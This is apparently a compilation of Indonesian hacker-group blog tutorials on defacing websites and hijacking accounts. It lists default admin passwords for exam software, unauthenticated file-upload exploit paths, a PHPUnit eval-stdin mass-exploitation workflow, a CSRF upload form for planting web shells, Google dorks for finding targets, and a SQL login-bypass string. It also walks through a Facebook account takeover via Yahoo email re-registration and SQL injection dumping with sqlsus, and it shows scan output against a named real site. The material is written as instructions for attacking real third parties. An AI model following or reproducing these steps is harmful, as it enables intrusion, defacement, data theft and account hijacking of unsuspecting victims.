Cara Deface Poc E-CBT 2019 With

    Default Password by D3C

Ini Gua Nemu Bug Bukan Bug Sih Tapi Password Default Yah Semacam Itu Lah

User : adminutama
Pass : admin12345

User : admin1
Pass : admin12345

User : admin2
Pass : admin12345

User : admin3
Pass : admin12345

Itu Beberapa Default Password Adminnya
Yah Intinya Lo Mau Pake Yang Mana Serah Lu Dah
Dan untuk adminnya Ketik
</> http://Site.lagi.co.li/admin </>
Ok Segitu Dulu Soalnya Gua Masih Belum Paham Ama Tuh Cbt_-
Dan untuk dorknya :
[+] CBT E School [+]
[+] intitle:Login Peserta + cbt [+]
Itu dork yang gua kembagin selanjutnya lo tinggal kembangin lagi jancook
+++++++++++++++++++++++++++++++++++
Kalo Ingin Nanya Noh Chat Gua Aja Gan
Wa : 083116774066
Fb : DmZ Hari Grimorume
Thanks To : ./EcchiExploit
                      MR_BL4CK_H4T10
                      VMPR7
                      MR. JACKERS
                      ./FELL
                      ALL MEMBER D3C

Cara Deface Poc IndoCBT By D3C

Nih Gua beri tahu bug cbt v11 atau indocbt 2018-2019
Bug cbt v11 atau indocbt 2018 itu bug nya terdapat di http://site.info/aksi/
(Gak Jauh Beda Ama Cbt Beesmart_-)
Intinya lo tambahin exsploitnya yaitu */aksi/* ini hanya berlaku untu cbt versi
11.0 atau indocbt
Dan untuk bugnya lo tinggal tambahin
exploit : */aksi/upload-file.php* jika blank berarti
vuln kalo gak berarti lo gak gans aoakka dan lo tinggal ke csrf online
Untuk post filenya : uploadfile (tergantung bugnya)

Untuk aksesnya lo tinggal ketik :
http://site.info/images/shell or
http://site.info/[dir]/images/shell

Ok itu adalah bug cbt v11 atau indocbt 2018/2019
Dan untuk dorknya
"INDOCBT" inurl:login.php
INDOCBT last update :
"Belajar Online" inurl:login.php
Itu beberapa dork yang gua kembagin selanjutnya lo tinggal kembangin lagi ok
++++++++++++++++++++++++++++++++++
Kalo Ingin Nanya Noh Chat Gua Aja Gan
Wa : 083116774066
Gmail : harigrimorum990@gmail.com
Thanks To - MR.H4R1
                    - MR. BL4CK_H4T10
                    - VMPR7
                    - ALL MEMBER D3C

Cara Deface PoC Laravel PhpUnit In Termux
Ok Kembali Lagi Ama Gua Yang Ah Sudah Lah Males Kenal Diri Langsung Tutor Aja
Lah Asu
1.Lo Download Dulu Scriptnya Di Blog Dark 3xploit Cyber atau disini

2.Kalo Dah Kedownload Cari Filenya Goblok

3.Cara Pakai Nya Dengan Ketik
"php phpunit.php your dork"
Dork Laravel PhpUnit :
'inurl:/Util/PHP/ site:.id'
'inurl:/phpunit/phpunit/ site:.com'
'inurl:/vendor/bin/ site:'
'inurl:/vendor/phpunit'
'inurl:/vendor/phpunit/phpunit/src/Util/PHP/ site:.net'
'intitle:"index of" intext:eval-stdin.php site:za'
'inurl:/Util/PHP/ intext:eval-stdin.php site:.com'
[+]Contoh : php phpunit.php inurl:/Util/PHP/ site:.id[+]

4.Tinggal Tunggu Sampai Proses Selesai Cuk...
Nah Kalo Udah Selesai Kalian Bisa Cek Filenya Di Directiory(File Manager) Kalian
yaitu result.txt dan revist.txt
*Note : Result.txt = web vuln + exploit succes
 Revist.txt = web vuln tapi exploit not success (Coba Manual Gan)

5.Tinggal Buka + Copas Url Nya Ke Google Nanti Akan Ada Uploadernya h3h3 Tinggal
lo upload shell atau sc lo
Sekian Dari Gua Tutor Laravel PhpUnit
+++++++++++++++++++++++++++++++++++
Jangan Lupa Contac Gua h3h3
Wa : 083116774066
Gmail : harigrimorum990@gmail.com
Fb : DmZ Hari Grimorum
Thanks To DARK 3XPLOIT CYBER
                    - MR.H4R1
                    - MR.BL4CK_H4T10
                    - VMPR7
                    - ALL MEMBER D3C

Cara Deface PoC Intespire Email Marketer

1.Lo Doring Dulu Yah Bujank
Nih Dorknya Bgsd
(+)Intile:"Control Panel" + emaiarketer(+)
(+)intitle:Control Panel "Login with your username and password below." +"Email"
+"Powered by"(+)
(+)intext:"Powered by Hairyspire Email Marketer"(+)
(Selebihnya Kemabangin Yah Goblok Jangan Ngemis Mulu Asu)

2.Lo Buat Csrfnya
+++++++++++++++++++++++++++++
<!DOCTYPE HTML>
<html lang="en-US">
<head>
 <meta charset="UTF-8">
 <title></title>
</head>
<body>
<form action="http://targetlo.co.id/surveys_submit.php?formId=990" method="post"
enctype="multipart/form-data">
 <input type="file" name="widget[0][field][][value]">
 <input type="submit" value="submit" name="submit">
</form>
</body>
</html>
++++++++++++++++++++++++++++++
Atau Bisa Download Di Blog Dark 3xploit Cyber disini

3.Exploitnya Asu "surveys_submit.php?formId=990"
*Note: (formid=) angkanya kalian ganti sesuai keinginan kalian jika kalian tidak
suka yah jangan di ganti goblok Kalo gua sukanya 990

4.Cara Memasukan Exploitnya Kek Gini
*http://kontol.co.li/surveys_submit.php?formId=990*
Atau
*http://kontol.co.li/[patch]/surveys_submit.php?formId=990*
*Note : Nah Kalo Blank Itu Vuln Yah Asu Kalo Gak Blank Berarti Lo Harus Cari
Yang Lain Jangan Dia Mulu Goblok

5.Terakhir Tempat Shell Lo
http://coli.co.li/admin/temp/[angka exploit lo]/[angka folder dari angka exploit
lo]/shell lo bujank
Atau
http://coli.co.li/[patch]/admin/temp/[angka exploit lo]/[angka folder dari angka
exploit lo]/shell lo bujank
Contoh:
http://coli.co.li/admin/temp/surveys/990/[angka folder dari exploit
lo]/kontol.php
*Note : Kalo 403 Kalian Bisa Scan Filenya Atau Kalian Bisa Minta Ke Gua file
scannya

Thanks to DARK 3XPLOIT CYBER (D3C)
Contac Gua h3h3
Wa : 083116774066
Gmail : harigrimorum990@gmail.com
Fb : DmZ Hari Grimorum
Sekian Dari Gua Tutor Interspire Email Marketer
Bye - Mr.H4R1
       - Mr.BL4CK_H4T10
       - VMPR7
       - All Member D3C

Cara Hack Website dengan Teknik Bypass Admin 

Jika ingin deface dengan Bypass Admin, siapkan terlebih dulu Dork dan Shell Extensi. Untuk yang belum mengerti apa itu dork, dork adalah tools hacking yang bisa dibuat oleh siapa saja. Anda bisa menggunakan Dork di bawah ini :

List Fresh Dork Magento Full Terbaru 2018 Lengkap:

inurl:/admin.php intext:login intext:adminsitrator
inurl:/admin/index.php intext:username
inurl :/admin/Admin.php intext:login
20. "inurl:admin/addproject.???"
21. "inurl:admin/addsale.???"
22. "inurl:admin/addschool.???"
23. "inurl:admin/addstate.???"
24. "inurl:admin/admin.???"
25. "inurl:admin/admincp.???"
26. "inurl:admin/payment.???"
27. "inurl:admin/selectitem.???"
28. "inurl:admin/settings.???"
29. "inurl:admin/showbook.???"
30. "inurl:admin/viewmanager.???"
31. "inurl:admin/viewproduct.???"
32. "inurl:user/emp.???"
33. 0admin/
34. 0manager/
35. AdminTools/
36. Database_Administration/
37. Indy_admin/
38. LiveUser_Admin/
39. Lotus_Domino_Admin/
40. PSUser/
41. Server/
42. ServerAdministrator/
43. Super-Admin/
44. SysAdmin/

Mari kita mulai hacks cara deface Bypass Admin :

Dorking ke Google, misalnya dengan memilih dork : inurl:/admin/index.php intext:username

Pilih salah satu website yang dinginkan.

Isi username dan password dengan kode ini ‘=’’or’
Perhatikan gambar.

 











Jika ada celah / atau website tersebut VULN, maka Anda bisa masuk ke Control Panel / Admin Panel web tersebut. Namun jika login gagal, Anda bisa mencari web vuln yang lain, atau kembali lagi dorking.

Tetapi jika login berhasil, Anda bisa melakukan apapun sesuai dengan keinginan Anda. Atau jika beruntung, Anda bisa upload shell, file-file html yang anda sudah siapkan.

Upload shell yang Anda miliki. Jika sudah, upload shell dan langkah selanjutnya adalah mencari letak shell yang sudah Anda upload. Jika sudah, upload halaman deface Anda, maka shell yang anda upload akan tampil, seperti gambar dibawah ini, atau dari ss peretasan yang pernah terjadi pada situs-situs di Indonesia.

Peretasan yang terjadi pada situs Telkomsel.

 

 

sumber : https://www.artikelcara10.com

Cara hack facebook dengan otak

 Assalamulaikum gan :v

apakabar ?

semoga ngk sehat :D
nah kali ini saya akan sharing dikit tentang bagaimana carnya hack fb dengan termux dengan menggunakan 2 tools yaitu YahooCloning dan OSIF..!!

Bahan yang di butuhkan :

1.Tools YahooCloning disini

2.Tools OSIF disini

3.Rokok Surya

4.Otak Mesum

5.Sabun

kemudian install dlu tools nya yahooCloning,,
link ada di atas :v

nah kalian masukan akun facebook kalian terus biarkan tools ini mencari
email yang vlun buat di hack :v
jika emailnya vlun maka itu tandanya bisa di hack jika not vlun itu tandanya lu kurang tangfan :v

nah setalah kalian dapatkan target yang mau di hack kalian check dlu akun facebook nya di crome yah jgan di fb lite :v

terus kalian copy link profil si korban ,,,kalian cari id korban di sini
Find My Id Facebook

terus copy link profil target di itu,,akan muncul id si korban kok :v

- kedua 
buka tab baru di termux install tools osif jika belum tau caranya bisa kunjungi di sini cara menggunakan osif 

nah disitu kalian bisa pilih ( get_info ) terus kalian masukan di id korban maka akan muncul semua informasi korban,,,

kemuadian,,buka crome ,,,btw termuxnya jgan di clos yah gan

kalian daftar yahoo sesuai nama email yahoo si target,,
daftar yahoo di sini

nah setelah kalian daftar dan verifikasi kode lewat nomor hp agan yang kalian login di faecbook crome yah...
terus masukan username target sesuai di username OSIF tadi yah,,

terus kalian pilih "lupa kata sandi" nah disini kalian verifikasinya lewat yahoo yah gan ...

kemudian agan chek yahoo,,,nah disitu akan ada kode verifikasi akun,,

terus klaian verifikasi mamank :v

nah setelah verifikasi kalian akan disuruh buat kata sandi baru wkwkwk :v

nah setalh bikin kata sandi kalian login lagi dengan username korban dan password yang kalian buat tadi,,,

nah maka kalian udah dapat akun si korban :v

terserah mau di apaain aja gan:v

sekian dlu yah informasi dari gw,,

kalau ada yang kurang jelas hubungi saya 

+1 920 777 4277

mohon maaf kurang lebihnya mohon di maafkan gan :)

salam mr.vampire  
Thanks to : D4RK 3XPL01T CYB3R

Assalamualaikum Wr.Wb
hey yo guys :v
Ketemu lagi dengan saya Mr.V4mp1r3 Gans :v

Kali ini saya akan menjelaskan tentang bagaimana
cara mencari celah SQL Injection dengan tools Stikers.

Apa itu tools strikers ?

Tools stikers adalah salah satu tools yang sering di
gunakan oleh berbagai macam hacking mulai dari newbie,sampai hacker expert,,karena tools ini adalah salah satu tools yang paling di bergunaka untuk mencari cela suatu website yang memiliki kerentanan
terhadapa SQL Injection.Alah itu aja dah itu juga klau lu baca males gw ngetik panjang lebar klau lu ngk baca akmj :v

langsung ke TKP aja Gans :v

1. Buka Termux kalian
2. masukan tools berikut ;

cd /sdcard

apt update && apt upgrade

Kloning Striker dengan perintah git

git clone https://github.com/UltimateHackers/Striker.git

cd Striker

pip2 install -r requirements.txt

Untuk menjalankan Striker ketik perintah berikut

python2 striker.py

setalah itu kalian masukin link yang kalian ingin scan
contoh : https://wawasankuluasbanget.com/index.php
nah kalian eksekusi link nya tanpa "index.php"
contoh : https://wawasankuluasbanget.com

setelah itu tools ini akan automatis mencari celah yang rentan terhadap SQL Injection.


 





























nah setalah kalian scan akan keliatan sendiri kok link yang rentan akan SQL Injection .. apabila lu sudah temukan linknya makan kalian langsung eksekusi link tersebut menggunakan sqlmap.

sekian dari saya kurang lebihnya mohon di maafkan...

salam Mr.V4mp1r3 Gans :v

Assalamualaikum Wr.Wb
Hey yo Gans :v
Apa kabar ,,,, bertemu lagi dengan saya Mr.V4mp1r3 Gans :v

Kali ini saya akan sharing tetang bagaimana cara meretas atau menghack website metode phpAdmin :v
yang kalian harus siapkan adalah ;

1. Internet yang lancar
2. Google / Crome
3. Rokok Surya & Kopi Black
4. Otak
5. Sabun

Okelah ngak usah lama lama lagi kita langsung ke TKP Gans :v

1).Pertama, masukkan dork di kotak pencarian Google


    Dork gan : filetype:ini “pdo_mysql” (pass|passwd|password|pwd)


2).Maksud dari filetype:ini adalah file informasi penyimpanan database website yang akan kita hack, lalu "(pass|passwd|password|pwd)" adalah passwordnya. jadi file website atau database yang biasa disimpan berformat "application.ini, settings.ini atau config.ini". Kalian juga bisa mengganti dengan filetype:asp, filetype:php, filetype:js etc tapi dijamin gak bakalan bisa work wkwwkwkwk :D


3).Setelah lu masukan memasukan dork diatas, pilih salah satu target. Tapi ingat, carilah kata-kata yang terdapat username dan password nya

4).Setelah masuk ke dalam websitenya, sobat tekan Ctrl+F pada keyboard lalu tulis "username". Contoh:


5).Kemudian lu  teruskan sendiri ya wkwkwwkwk...

Sekian tutrial dari saya semoga tidak bermanfaat :v jika ada kurang tolong di maafkan dan jika ada lebihnya tolong do kembalikan gan :v
Jagan terlalu bangga dengan apa yang kalian peroleh dan jagan sombong denga apa yang telah kalian miliki.
Belajarlah sebagai pemula ,,karena jika kau belajar jadi pemula maka dunia akan terbuka lebar untukMu
#BacotAnjirr:v

#We Are D3C
#We Are Illusion
#We Are One
#We Are There Because
#We do not Forget
#We do not Forgiv
#EXPECT US !

Salam Mr.V4mpir3 

Thanks to : https://ianzcreative.blogspot.com/

Cara Install Dan Menggunakan OSIF Di Termux
 - Pada artikel kali ini Android Tutorialku akan memberikan tutorial cara install dan menggunakan osif di termux untuk melihat informasi penting di facebook. OSIF (Open Source Information Facebook) merupakan tool berfungsi untuk melihat data-data penting seperti email, nomor hp, dan ID facebook pada akun teman kalian. Baca juga 
Yuk simak tutorialnya Mamank.....

• Update dan upgrade termux dengan perintah

$ apt update && apt upgrade

• Karena tool ini menggunakan bahasa pemrograman python maka harus install python terlebih dahulu dengan command

$ apt install python2

• Kemudian install mechanize

$ pip2 install requests mechanize

• Install git dengan perintah

$ apt install git

• Clone tool OSIF nya dengan perintah

$ git clone https://github.com/CiKu370/OSIF.git

• Masuk ke directory osif

$ cd OSIF

• Install tool nya dengan perintah

$ pip2 install -r requirements.txt

• Dan sekarang tinggal menjalankan tool OSIF dengan command

$ python2 osif.py

 
• Login akun fb kalian dgn command

$ token

• Berikut command dan keterangan yang terdapat pada tool OSIF

get_data => fetching all friends data 

get_info => show information about 

your friend dump_id => fetching all id from friend list 

dump_phone => fetching all phone number from friend list 

dump_mail => fetching all emails from friend list 

token => Generate access token 

cat_token => show your access token 

rm_token => remove access token 

bot => open bot menu 

clear => clear terminal 

help => show help 

about => Show information about this program 

exit => Exit the program

SQL Injection website vulnerability dengan SQLSUS di Kali Linux 2.0

SQL Injection website vulnerability dengan SQLSUS di Kali Linux 2.0

Mr.V4MP1R3

hello guys bertemu kembali bersama saya Mr.V4mp1r3

huhh udah lama sekali saya tidak menuliskan artikel 

ok tenang saja kali ini saya akan share cara menginject web yang vuln dengan menggunakan Sqlsus di Kali linux maupun linux turunan lain nya , disini saya test dengan menggunakan Kali Linux 2.0 versi ke 2

ok simak saja dan ikuti step by step nya

pertama anda buka terminal terlebih dahulu dan ketikan :

" $ sqlsus "

persis sama seperti gambar di atas

selanjutnya buat folder baru di desktop , terserah anda mau buat folder baru nya dimana saja

disini saya membuat folder baru di Desktop :

" $ cd Desktop "

" $ mkdir root " >> fungsi Mkdir ini adalah untuk membuat folder dan root nya nama folder baru tersebut , bebas nama nya terserah anda yang memberikan ^_^

" $ cd root " >> masuk ke folder baru yang tadi di buat dan ketikan sqlsus untuk membuat localhost.conf  yang fungsi nya untuk menginject website vuln ^_^ cari web vuln nya sesuai target anda masing-masing

nah kita buat dulu " .conf " contoh nama nya localhost.conf , dan disini saya memberikan nama nya 

" vuln.conf "

" $ sqlsus -g vuln.conf  " >> -g = yaitu generate configuration file > yang mana nanti nya untuk menginject suatu website vulnerability

jika sudah maka akan tersave di folder yang sebelumnya di buat yaitu folder root >> root itu nama folder saya yang berada di Desktop

buka folder tersebut yang tadi di buat yang di masukan contoh " vuln.conf "

jika anda bingung lihat gambar di bawah ini

selanjut nya cari " $ url_start " dan masukan website vuln anda

disini saya sudah menemukan website vuln ^_^ , jika masih bingung lihat gambar di bawah ini

jika target sudah di masukan di " $ url_start " kemudian jangan lupa di SAVE

jika sudah di save , kembali ke terminal dan ketikan perintah ini :

" $ sqlsus vuln.conf " >> jika save berhasil maka sqlsus akan membaca nya Loaded

hmm sukses , nah baru sekarang di inject ^_^

ketikan perintah :

" $ sqlsus> start " >> fungsi start yaitu untuk memulai , tunggu proses hingga selesai maka akan muncul database website tersebut

database sudah terlihat , dan ketikan perintah untuk mengetahui isi nya :

" $ sqlsus> get tables " >> fungsi nya untuk mendapatkan tables pada isi database web tersebut

tables sudah terlihat  dan ada banyak macam tables , disini saya akan melihat isi tables " Admin " dari website tersebut

ketikan perintah :

" $ sqlsus> get columns admin " >> fungsi nya untuk melihat isi columns pada tables admin

selanjutnya dump columns admin tersebut , ketikan :

" $ sqlsus> select * from admin "

dan hasil nya .. cukup sampai disini saja toturial nya ^_^ nanti kalau di lanjutkan berbahaya 

dan bagaimana cari halaman login admin nya ? bener-bener susah dan agak gampang :V tergantung website nya kalau login admin nya di sembunyikan aatau nama login admin nya di ubah nama nya :V seperti hal nya wordpress :V , cara mencari admin login dari mana ? gampang kok coba aja pake AdminFinder.pl atau ga contoh > www.localhost.com/admin/ atau /login/admin.php  > biasa nya itu doang kalau website yang masih default atau si programmer nya males update :v atau security web nya ga pernah update juga :V

ok cukup sekian tutorial mengenai hack website dengan SQLSUS di Kali Linux 2.0

semoga bermanfaat ya

Sumber : https://www.gagaltotal666.website/2016/09/sql-injection-website-vulnerability.html

W3AF Console 2007

—Overview
W3af adalah singkatan dari web audit framework. W3af pada dasarnya adalah sebuah program python yang berfungsi untuk mengaudit keamanan sebuah website.  W3af memiliki banyak plugin yang terbagi dalam serangan,misalnya: audit, mengeksploitasi, menemukan celah, bruteforce, mangle dan indentifikasi email si pemilik web. Dan artikel ini saya angkat dari sebuah blog yang diposting tahun 2007.
—Getting started
Dalam uji coba ini saya menggunakan backtrack 5, dan secara default sudah terinstall. Untuk bagian menunya bisa dilihat seperti banner diatas.
Jika anda menggunakan ubuntu, bisa langsung di ketik  sudo apt-get install w3af
Oke, saya anggap smua sudah memulai tampilan awalnya yah. disini saya mengetik help.

Code :

1 2 3 4 5 6 7 8 9 10 11 12 13

w3af>>> help The following commands are available: help                You are here. help [command] prints more specific help. url-settings        Configure the URL opener. misc-settings       Configure w3af misc settings. session             Load and save sessions. plugins             Enable, disable and configure plugins. start               Start site analysis. exploit             Exploit a vulnerability. tools               Enter the tools section. target              Set the target URL. exit                Exit w3af. w3af>>>

—Configuration & Menentukan Target. Dalam pengujian ini, saya menggunakan web FPI sebagai target. Ingat, disini saya hanya sebatas mengujicoba tanpa ada niat lebih lanjut.

Code:

1 2 3 4 5 6 7 8 9 10 11 12 13

w3af>>> target   w3af/config:target>>> help |--------------------------------------------------------------------------------------------------| | view | List the available options and their values. | | set | Set a parameter value. | |--------------------------------------------------------------------------------------------------| | back | Go to the previous menu. | | exit | Exit w3af. | | assert | Check assertion. | |--------------------------------------------------------------------------------------------------| w3af/config:target>>> set target http://www.fpi.or.id/ w3af/config:target>>> view

Dan hasil configurasi targetnya adalah:

—Configurasi plugin.

Code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

w3af/config:target>>> back w3af>>> plugins w3af/plugins>>> help |--------------------------------------------------------------------------------------| | list              | List available plugins.                                          | |--------------------------------------------------------------------------------------| | back              | Go to the previous menu.                                         | | exit              | Exit w3af.                                                           | | assert            | Check assertion.                                                     | |---------------------------------------------------------------------------------------| | discovery         | View, configure and enable discovery plugins                      | | output            | View, configure and enable output plugins                         | | mangle            | View, configure and enable mangle plugins                         | | evasion           | View, configure and enable evasion plugins                        | | bruteforce        | View, configure and enable bruteforce plugins                     | | audit             | View, configure and enable audit plugins                          | | grep              | View, configure and enable grep plugins                           | |---------------------------------------------------------------------------------------|

—Memilih Serangan
Disini saya menggunakan audit xss,xsrf,sqli.

Code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

w3af>>> plugins w3af/plugins>>> help |--------------------------------------------------------------------------------------------------| | list              | List available plugins.                                                      | |--------------------------------------------------------------------------------------------------| | back              | Go to the previous menu.                                                     | | exit              | Exit w3af.                                                                   | | assert            | Check assertion.                                                             | |--------------------------------------------------------------------------------------------------| | discovery         | View, configure and enable discovery plugins                                 | | output            | View, configure and enable output plugins                                    | | mangle            | View, configure and enable mangle plugins                                    | | evasion           | View, configure and enable evasion plugins                                   | | bruteforce        | View, configure and enable bruteforce plugins                                | | audit             | View, configure and enable audit plugins                                     | | grep              | View, configure and enable grep plugins                                      | |--------------------------------------------------------------------------------------------------| w3af/plugins>>> audit xss,xsrf,sqli w3af/plugins>>> output console,htmlFile w3af/plugins>>> output config htmlFile

Sesuai source diatas, saya menggunakan output console,htmlFile sebagai hasil dari uji coba aplikasi ini.
Perlu diketahui, bentuk serangan yang bisa kita gunakan adalah conthnya sperti ini.
w3af/plugins>>> audit xss,xsrf,sqli
atau w3af/plugins>>> audit all
Contohnya:

1 2 3 4 5 6 7 8 9

w3af/plugins>>> audit xss w3af/plugins>>> audit Enabled audit plugins: xss w3af/plugins>>> discovery webSpider,pykto,hmap w3af/plugins>>> discovery Enabled discovery plugins: webSpider pykto

Jika konfigurasinya sudah kita atur, mari kita running apa yang telah kita setting.

Code:

1 2 3 4 5 6 7 8 9 10

w3af/plugins/output/config:htmlFile>>> view |--------------------------------------------------------------------------------------------------| | Setting   | Value         | Description                                                          | |--------------------------------------------------------------------------------------------------| | verbose   | False         | True if debug information will be appended to the report.            | | fileName  | report.html   | File name where this plugin will write to                            | |--------------------------------------------------------------------------------------------------| w3af/plugins/output/config:htmlFile>>> back w3af/plugins>>> back w3af>>> start

—Hasil Scanning

Code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

w3af>>> start Auto-enabling plugin: grep.collectCookies Auto-enabling plugin: grep.error500 Found 2 URLs and 2 different points of injection. The list of URLs is: - http://www.fpi.or.id/ - http://www.fpi.or.id/index.php?p=search The list of fuzzable requests is: - http://www.fpi.or.id/ | Method: GET - http://www.fpi.or.id/index.php?p=search | Method: POST | Parameters: (search="") Cross Site Scripting was found at: "http://www.fpi.or.id/index.php?p=search", using HTTP method POST. The sent post-data was: "search=<ScRIpT>alert(String.fromCharCode(vWv0))</SCriPT>&searchbtn=Cari". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 18. The web application sent a persistent cookie. The URL: "http://www.fpi.or.id/" sent these cookies: -  PHPSESSID=01fb079704b7a5839a303fd843e68107; Path=/ - PHPSESSID=01fb079704b7a5839a303fd843e68107; path=/ Finished scanning process. w3af>>>

Dari hasil scanning diatas,dapat kita ketahui kalau web tersebut memiliki kelemahan pada XSS. Potensi serangan yang dapat dilakukan attacker adalah melakukan pemanggilan Get Web Shell, setelah pemanggilan web shell, maka web tersebut dapat diambil alih.
Dalam artikel ini, dengan tegas saya hanya melakukan scanning pencarian celah dan melihat potensi defacingnya tanpa ada perusakan lebih lanjut.
—Done